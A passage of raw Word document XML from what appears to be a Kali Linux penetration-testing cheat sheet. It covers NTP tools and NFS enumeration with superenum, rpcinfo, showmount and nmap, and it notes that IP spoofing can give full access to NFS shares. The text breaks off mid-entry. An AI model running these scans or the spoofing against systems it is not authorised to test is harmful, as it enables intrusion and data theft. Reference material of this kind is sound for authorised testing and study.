          <w:p w14:paraId="14492FBE" w14:textId="4E9F4A0B" w:rsidR="00CC375B" w:rsidRPr="00371A6E" w:rsidRDefault="00371A6E" w:rsidP="000A77DA">
            <w:r w:rsidRPr="00371A6E">
              <w:t>To monitor NT</w:t>
            </w:r>
            <w:r>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:t xml:space="preserve"> daemon operations and determine performance, use:</w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ntpq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00371A6E" w14:paraId="39828DA0" w14:textId="77777777" w:rsidTr="00CC375B">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12D7F39A" w14:textId="07FA5592" w:rsidR="00371A6E" w:rsidRDefault="00371A6E" w:rsidP="000A77DA">
            <w:r>
              <w:t>53.e</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01A92880" w14:textId="48F4291D" w:rsidR="00371A6E" w:rsidRDefault="00371A6E" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>ntpdate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DE23B5A" w14:textId="77777777" w:rsidR="00371A6E" w:rsidRDefault="00371A6E" w:rsidP="00371A6E">
            <w:r>
              <w:t>To collect the number of time samples from several time sources, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ntpdate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:t>Keep in mind that this one may need to be installed on Kali Linux:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">ntpdate       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="518369E6" w14:textId="486D4694" w:rsidR="00371A6E" w:rsidRPr="00371A6E" w:rsidRDefault="00371A6E" w:rsidP="00371A6E">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00371A6E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ntpsec-ntpdate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00860A91" w14:paraId="3F055CCD" w14:textId="77777777" w:rsidTr="000A77DA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="74703B84" w14:textId="77777777" w:rsidR="00860A91" w:rsidRDefault="00860A91" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="10A82853" w14:textId="77777777" w:rsidR="00860A91" w:rsidRDefault="00860A91" w:rsidP="000A77DA"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E1FA4E3" w14:textId="77777777" w:rsidR="00860A91" w:rsidRDefault="00860A91" w:rsidP="000A77DA"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12957AF4" w14:textId="77777777" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF"/>
    <w:p w14:paraId="42E2C110" w14:textId="77777777" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="10156A11" w14:textId="373B454B" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF" w:rsidP="00BE43BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port, Service and Web Page Scanning:</w:t>
      </w:r>
      <w:r w:rsidR="00EE328B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE328B" w:rsidRPr="00EE328B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SuperEnum</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(NFS enumeration)</w:t>
      </w:r>
      <w:r w:rsidR="00AF373A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | rpcinfo</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BE43BF" w14:paraId="0CE2BB17" w14:textId="77777777" w:rsidTr="00C50256">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2092CD31" w14:textId="35322A0D" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="3AD6A16D" w14:textId="50C4D974" w:rsidR="00BE43BF" w:rsidRPr="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EE328B">
              <w:t>superenum</w:t>
            </w:r>
            <w:r w:rsidR="00C706A1">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C706A1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(superenum is not installed on Kali Linux by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="56FB9728" w14:textId="5E4D6723" w:rsidR="00BE43BF" w:rsidRDefault="00BE43BF" w:rsidP="00BE43BF">
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS ACCESS TO AN NFS SERVICE, OTHERWISE SKIP.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>NFS enumeration is able to identify exported directories and extract a list of clients connected to the server, along with their IP addresses and shared data associated with them. After gathering this information, it is possible to spoof target IP addresses to gain full access to the shared files on the server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF373A" w14:paraId="6FF9D42B" w14:textId="77777777" w:rsidTr="00AF373A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="701CFCE7" w14:textId="2400D0D7" w:rsidR="00AF373A" w:rsidRDefault="00AF373A" w:rsidP="000A77DA">
            <w:r>
              <w:t>54.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="231F1AFD" w14:textId="48A12DBE" w:rsidR="00AF373A" w:rsidRPr="00EE328B" w:rsidRDefault="00AF373A" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>rpcinfo</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00AF373A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(rpcinfo is installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0157251C" w14:textId="27BEAE91" w:rsidR="00AF373A" w:rsidRPr="00186C42" w:rsidRDefault="00186C42" w:rsidP="00BE43BF">
            <w:r>
              <w:t>To scan a target IP address for open NFS ports, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>rpcinfo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:t>To check a list of shared files and directories, use:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5B1321" w14:textId="68ADA311" w:rsidR="00186C42" w:rsidRPr="00EE328B" w:rsidRDefault="00186C42" w:rsidP="00BE43BF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">showmount </w:t>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-e </w:t>
            </w:r>
            <w:r w:rsidRPr="00186C42">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EE328B" w14:paraId="12953746" w14:textId="77777777" w:rsidTr="00EE328B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="494B26E7" w14:textId="38411E7C" w:rsidR="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00AF373A">
              <w:t>c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="63203F89" w14:textId="28B3878A" w:rsidR="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE328B">
              <w:t>superenum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C706A1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(We will be using Terminal to install)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="25062665" w14:textId="7F2ADC7C" w:rsidR="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="00BE43BF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">To install SuperEnum, first navigate to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>it’s</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> GitHub page:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> https://github.com/p4pentest/SuperEnum</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47AEDB56" w14:textId="1CA5188F" w:rsidR="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="00BE43BF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EE328B">
              <w:t xml:space="preserve">From here, you can click on the green ‘Code’ button, then click on the clipboard icon which will copy the URL we need, it will be something like: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/p4pentest/SuperEnum.git</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100CA5DC" w14:textId="6427D313" w:rsidR="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="00BE43BF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Now, in terminal, we should move to a folder location we want to create a new directory in for us to save SuperEnum into:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>In this location, we will use the git command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>clone</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EE328B">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/p4pentest/SuperEnum.git</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4321CB48" w14:textId="77777777" w:rsidR="00EE328B" w:rsidRDefault="00EE328B" w:rsidP="00BE43BF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">This will create a folder called SuperEnum, </w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r>
              <w:t>into it and change the permissions for</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:t xml:space="preserve"> these two files, granting them execute permission</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> chmod</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>superenum</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> chmod</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>x</w:t>
            </w:r>
            <w:r w:rsidR="00842DD7">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00842DD7" w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>commands.config</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67325FE1" w14:textId="095931FE" w:rsidR="00842DD7" w:rsidRPr="00842DD7" w:rsidRDefault="00842DD7" w:rsidP="00BE43BF">
            <w:r>
              <w:t>And, finally, remember to create a text file with the IP address of the target you wish to scan:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>echo “</w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r w:rsidR="00C706A1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00C706A1" w:rsidRPr="00C706A1">
              <w:t xml:space="preserve">You can enter multiple ID addresses within this file should you wish to scan multiple IP’s. </w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:t>And, if you need to, due to lack of privileges, change the directory permission using:</w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> chmod</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>777</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00842DD7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C50256" w14:paraId="706903BA" w14:textId="77777777" w:rsidTr="00C50256">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63929FD6" w14:textId="3F76A2AC" w:rsidR="00C50256" w:rsidRDefault="00C50256" w:rsidP="000A77DA">
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="003C01E2">
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00AF373A">
              <w:t>d</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0B0ABBB2" w14:textId="56EA2D9B" w:rsidR="00C50256" w:rsidRPr="00EE328B" w:rsidRDefault="00C50256" w:rsidP="000A77DA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00EE328B">
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FD6C732" w14:textId="77777777" w:rsidR="00C50256" w:rsidRDefault="00C50256" w:rsidP="00BE43BF">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>First, use nmap to check if the default port for NFS is open, port 2049:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C50256">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50256">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50256">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>2049</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00C50256">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1793C6AF" w14:textId="77777777" w:rsidR="004526B4" w:rsidRPr="004526B4" w:rsidRDefault="004526B4" w:rsidP="00BE43BF">
            <w:r w:rsidRPr="004526B4">
              <w:t>It could be that port 111 is open for rpcbind, we can enumerate via:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35CF652B" w14:textId="4B621544" w:rsidR="004526B4" w:rsidRDefault="004526B4" w:rsidP="00BE43BF">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004526B4">
